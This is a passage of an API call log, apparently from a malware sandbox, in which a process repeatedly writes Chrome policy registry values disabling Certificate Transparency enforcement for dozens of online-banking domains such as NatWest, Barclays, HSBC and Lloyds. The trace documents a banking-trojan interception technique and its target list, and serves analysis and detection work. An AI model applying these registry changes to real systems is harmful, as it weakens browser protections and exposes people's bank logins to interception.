	[0192.954] RegCloseKey (hKey=0x5fc) returned 0x0
	[0192.954] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5f8) returned 0x0
	[0192.954] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x600, lpdwDisposition=0x0) returned 0x0
	[0192.954] RegSetValueExA (in: hKey=0x600, lpValueName="228", Reserved=0x0, dwType=0x1, lpData="www.kbinternetbanking.com", cbData=0x19 | out: lpData="www.kbinternetbanking.com") returned 0x0
	[0192.955] RegCloseKey (hKey=0x600) returned 0x0
	[0192.955] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5fc) returned 0x0
	[0192.955] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x604, lpdwDisposition=0x0) returned 0x0
	[0192.955] RegSetValueExA (in: hKey=0x604, lpValueName="229", Reserved=0x0, dwType=0x1, lpData="kbinternetbanking.com", cbData=0x15 | out: lpData="kbinternetbanking.com") returned 0x0
	[0192.956] RegCloseKey (hKey=0x604) returned 0x0
	[0192.956] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x600) returned 0x0
	[0192.956] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x608, lpdwDisposition=0x0) returned 0x0
	[0192.956] RegSetValueExA (in: hKey=0x608, lpValueName="230", Reserved=0x0, dwType=0x1, lpData="ibank.reliancebankltd.com", cbData=0x19 | out: lpData="ibank.reliancebankltd.com") returned 0x0
	[0192.957] RegCloseKey (hKey=0x608) returned 0x0
	[0192.957] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x604) returned 0x0
	[0192.957] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x60c, lpdwDisposition=0x0) returned 0x0
	[0192.957] RegSetValueExA (in: hKey=0x60c, lpValueName="231", Reserved=0x0, dwType=0x1, lpData="online.duncanlawrie.com", cbData=0x17 | out: lpData="online.duncanlawrie.com") returned 0x0
	[0192.958] RegCloseKey (hKey=0x60c) returned 0x0
	[0192.958] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x608) returned 0x0
	[0192.958] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x610, lpdwDisposition=0x0) returned 0x0
	[0192.958] RegSetValueExA (in: hKey=0x610, lpValueName="232", Reserved=0x0, dwType=0x1, lpData="esavings.shawbrook.co.uk", cbData=0x18 | out: lpData="esavings.shawbrook.co.uk") returned 0x0
	[0192.959] RegCloseKey (hKey=0x610) returned 0x0
	[0192.960] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x60c) returned 0x0
	[0192.960] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x614, lpdwDisposition=0x0) returned 0x0
	[0192.960] RegSetValueExA (in: hKey=0x614, lpValueName="233", Reserved=0x0, dwType=0x1, lpData="bureau.bottomline.co.uk", cbData=0x17 | out: lpData="bureau.bottomline.co.uk") returned 0x0
	[0192.961] RegCloseKey (hKey=0x614) returned 0x0
	[0192.961] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x610) returned 0x0
	[0192.961] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x618, lpdwDisposition=0x0) returned 0x0
	[0192.961] RegSetValueExA (in: hKey=0x618, lpValueName="234", Reserved=0x0, dwType=0x1, lpData="www.bankline.rbs.com", cbData=0x14 | out: lpData="www.bankline.rbs.com") returned 0x0
	[0192.962] RegCloseKey (hKey=0x618) returned 0x0
	[0192.962] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x614) returned 0x0
	[0192.962] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x61c, lpdwDisposition=0x0) returned 0x0
	[0192.962] RegSetValueExA (in: hKey=0x61c, lpValueName="235", Reserved=0x0, dwType=0x1, lpData="bankline.rbs.com", cbData=0x10 | out: lpData="bankline.rbs.com") returned 0x0
	[0192.963] RegCloseKey (hKey=0x61c) returned 0x0
	[0192.963] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x618) returned 0x0
	[0192.963] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x620, lpdwDisposition=0x0) returned 0x0
	[0192.963] RegSetValueExA (in: hKey=0x620, lpValueName="236", Reserved=0x0, dwType=0x1, lpData="lloydslink.online.lloydsbank.com", cbData=0x20 | out: lpData="lloydslink.online.lloydsbank.com") returned 0x0
	[0192.964] RegCloseKey (hKey=0x620) returned 0x0
	[0192.964] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x61c) returned 0x0
	[0192.964] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x624, lpdwDisposition=0x0) returned 0x0
	[0192.964] RegSetValueExA (in: hKey=0x624, lpValueName="237", Reserved=0x0, dwType=0x1, lpData="www.bankline.ulsterbank.ie", cbData=0x1a | out: lpData="www.bankline.ulsterbank.ie") returned 0x0
	[0192.965] RegCloseKey (hKey=0x624) returned 0x0
	[0192.965] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x620) returned 0x0
	[0192.965] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x628, lpdwDisposition=0x0) returned 0x0
	[0192.965] RegSetValueExA (in: hKey=0x628, lpValueName="238", Reserved=0x0, dwType=0x1, lpData="bankline.ulsterbank.ie", cbData=0x16 | out: lpData="bankline.ulsterbank.ie") returned 0x0
	[0192.966] RegCloseKey (hKey=0x628) returned 0x0
	[0192.966] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x624) returned 0x0
	[0192.966] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x62c, lpdwDisposition=0x0) returned 0x0
	[0192.966] RegSetValueExA (in: hKey=0x62c, lpValueName="239", Reserved=0x0, dwType=0x1, lpData="www.business.hsbc.co.uk", cbData=0x17 | out: lpData="www.business.hsbc.co.uk") returned 0x0
	[0192.967] RegCloseKey (hKey=0x62c) returned 0x0
	[0192.967] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x628) returned 0x0
	[0192.967] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x630, lpdwDisposition=0x0) returned 0x0
	[0192.967] RegSetValueExA (in: hKey=0x630, lpValueName="240", Reserved=0x0, dwType=0x1, lpData="business.hsbc.co.uk", cbData=0x13 | out: lpData="business.hsbc.co.uk") returned 0x0
	[0192.968] RegCloseKey (hKey=0x630) returned 0x0
	[0192.968] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x62c) returned 0x0
	[0192.968] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x634, lpdwDisposition=0x0) returned 0x0
	[0192.968] RegSetValueExA (in: hKey=0x634, lpValueName="241", Reserved=0x0, dwType=0x1, lpData="banking.bankofscotland.co.uk", cbData=0x1c | out: lpData="banking.bankofscotland.co.uk") returned 0x0
	[0192.969] RegCloseKey (hKey=0x634) returned 0x0
	[0192.969] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x630) returned 0x0
	[0192.969] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x638, lpdwDisposition=0x0) returned 0x0
	[0192.969] RegSetValueExA (in: hKey=0x638, lpValueName="242", Reserved=0x0, dwType=0x1, lpData="www.bankline.natwest.com", cbData=0x18 | out: lpData="www.bankline.natwest.com") returned 0x0
	[0192.970] RegCloseKey (hKey=0x638) returned 0x0
	[0192.970] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x634) returned 0x0
	[0192.970] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x63c, lpdwDisposition=0x0) returned 0x0
	[0192.971] RegSetValueExA (in: hKey=0x63c, lpValueName="243", Reserved=0x0, dwType=0x1, lpData="bankline.natwest.com", cbData=0x14 | out: lpData="bankline.natwest.com") returned 0x0
	[0192.971] RegCloseKey (hKey=0x63c) returned 0x0
	[0192.971] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x638) returned 0x0
	[0192.972] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x640, lpdwDisposition=0x0) returned 0x0
	[0192.972] RegSetValueExA (in: hKey=0x640, lpValueName="244", Reserved=0x0, dwType=0x1, lpData="online-business.bankofscotland.co.uk", cbData=0x24 | out: lpData="online-business.bankofscotland.co.uk") returned 0x0
	[0192.973] RegCloseKey (hKey=0x640) returned 0x0
	[0192.973] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x63c) returned 0x0
	[0192.973] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x644, lpdwDisposition=0x0) returned 0x0
	[0192.973] RegSetValueExA (in: hKey=0x644, lpValueName="245", Reserved=0x0, dwType=0x1, lpData="ebanking2.danskebank.co.uk", cbData=0x1a | out: lpData="ebanking2.danskebank.co.uk") returned 0x0
	[0192.974] RegCloseKey (hKey=0x644) returned 0x0
	[0192.974] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x640) returned 0x0
	[0192.974] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x648, lpdwDisposition=0x0) returned 0x0
	[0192.974] RegSetValueExA (in: hKey=0x648, lpValueName="246", Reserved=0x0, dwType=0x1, lpData="northrimbankonline.btbanking.com", cbData=0x20 | out: lpData="northrimbankonline.btbanking.com") returned 0x0
	[0192.976] RegCloseKey (hKey=0x648) returned 0x0
	[0192.976] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x644) returned 0x0
	[0192.976] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x64c, lpdwDisposition=0x0) returned 0x0
	[0192.976] RegSetValueExA (in: hKey=0x64c, lpValueName="247", Reserved=0x0, dwType=0x1, lpData="home2.ybonline.co.uk", cbData=0x14 | out: lpData="home2.ybonline.co.uk") returned 0x0
	[0192.977] RegCloseKey (hKey=0x64c) returned 0x0
	[0192.977] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x648) returned 0x0
	[0192.977] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x650, lpdwDisposition=0x0) returned 0x0
	[0192.977] RegSetValueExA (in: hKey=0x650, lpValueName="248", Reserved=0x0, dwType=0x1, lpData="www.natwestibanking.com", cbData=0x17 | out: lpData="www.natwestibanking.com") returned 0x0
	[0192.978] RegCloseKey (hKey=0x650) returned 0x0
	[0192.978] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x64c) returned 0x0
	[0192.978] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x654, lpdwDisposition=0x0) returned 0x0
	[0192.978] RegSetValueExA (in: hKey=0x654, lpValueName="249", Reserved=0x0, dwType=0x1, lpData="natwestibanking.com", cbData=0x13 | out: lpData="natwestibanking.com") returned 0x0
	[0192.979] RegCloseKey (hKey=0x654) returned 0x0
	[0192.979] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x650) returned 0x0
	[0192.979] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x658, lpdwDisposition=0x0) returned 0x0
	[0192.979] RegSetValueExA (in: hKey=0x658, lpValueName="250", Reserved=0x0, dwType=0x1, lpData="ibb.firsttrustbank1.co.uk", cbData=0x19 | out: lpData="ibb.firsttrustbank1.co.uk") returned 0x0
	[0192.980] RegCloseKey (hKey=0x658) returned 0x0
	[0192.980] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x654) returned 0x0
	[0192.980] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x65c, lpdwDisposition=0x0) returned 0x0
	[0192.980] RegSetValueExA (in: hKey=0x65c, lpValueName="251", Reserved=0x0, dwType=0x1, lpData="netbanking.ubluk.com", cbData=0x14 | out: lpData="netbanking.ubluk.com") returned 0x0
	[0192.981] RegCloseKey (hKey=0x65c) returned 0x0
	[0192.981] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x658) returned 0x0
	[0192.981] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x660, lpdwDisposition=0x0) returned 0x0
	[0192.981] RegSetValueExA (in: hKey=0x660, lpValueName="252", Reserved=0x0, dwType=0x1, lpData="my.sjpbank.co.uk", cbData=0x10 | out: lpData="my.sjpbank.co.uk") returned 0x0
	[0192.982] RegCloseKey (hKey=0x660) returned 0x0
	[0192.982] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x65c) returned 0x0
	[0192.982] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x664, lpdwDisposition=0x0) returned 0x0
	[0192.983] RegSetValueExA (in: hKey=0x664, lpValueName="253", Reserved=0x0, dwType=0x1, lpData="bank.barclays.co.uk", cbData=0x13 | out: lpData="bank.barclays.co.uk") returned 0x0
	[0192.983] RegCloseKey (hKey=0x664) returned 0x0
	[0192.983] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x660) returned 0x0
	[0192.984] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x668, lpdwDisposition=0x0) returned 0x0
	[0192.984] RegSetValueExA (in: hKey=0x668, lpValueName="254", Reserved=0x0, dwType=0x1, lpData="alolb1.arbuthnotlatham.co.uk", cbData=0x1c | out: lpData="alolb1.arbuthnotlatham.co.uk") returned 0x0
	[0192.984] RegCloseKey (hKey=0x668) returned 0x0
	[0192.985] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x664) returned 0x0
	[0192.985] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x66c, lpdwDisposition=0x0) returned 0x0
	[0192.985] RegSetValueExA (in: hKey=0x66c, lpValueName="255", Reserved=0x0, dwType=0x1, lpData="online.hoaresbank.co.uk", cbData=0x17 | out: lpData="online.hoaresbank.co.uk") returned 0x0
	[0192.986] RegCloseKey (hKey=0x66c) returned 0x0
	[0192.986] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x668) returned 0x0
	[0192.986] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x670, lpdwDisposition=0x0) returned 0x0
	[0192.986] RegSetValueExA (in: hKey=0x670, lpValueName="256", Reserved=0x0, dwType=0x1, lpData="butterfieldonline.co.uk", cbData=0x17 | out: lpData="butterfieldonline.co.uk") returned 0x0
	[0192.987] RegCloseKey (hKey=0x670) returned 0x0
	[0192.987] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x66c) returned 0x0
	[0192.987] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x674, lpdwDisposition=0x0) returned 0x0
	[0192.987] RegSetValueExA (in: hKey=0x674, lpValueName="257", Reserved=0x0, dwType=0x1, lpData="ibusinessbanking.aib.ie", cbData=0x17 | out: lpData="ibusinessbanking.aib.ie") returned 0x0
	[0192.988] RegCloseKey (hKey=0x674) returned 0x0
	[0192.988] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x670) returned 0x0
	[0192.988] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x678, lpdwDisposition=0x0) returned 0x0
	[0192.988] RegSetValueExA (in: hKey=0x678, lpValueName="258", Reserved=0x0, dwType=0x1, lpData="www.internationalpayments.co.uk", cbData=0x1f | out: lpData="www.internationalpayments.co.uk") returned 0x0
	[0192.989] RegCloseKey (hKey=0x678) returned 0x0
	[0192.989] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x674) returned 0x0
	[0192.989] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x67c, lpdwDisposition=0x0) returned 0x0
	[0192.989] RegSetValueExA (in: hKey=0x67c, lpValueName="259", Reserved=0x0, dwType=0x1, lpData="internationalpayments.co.uk", cbData=0x1b | out: lpData="internationalpayments.co.uk") returned 0x0
	[0192.990] RegCloseKey (hKey=0x67c) returned 0x0
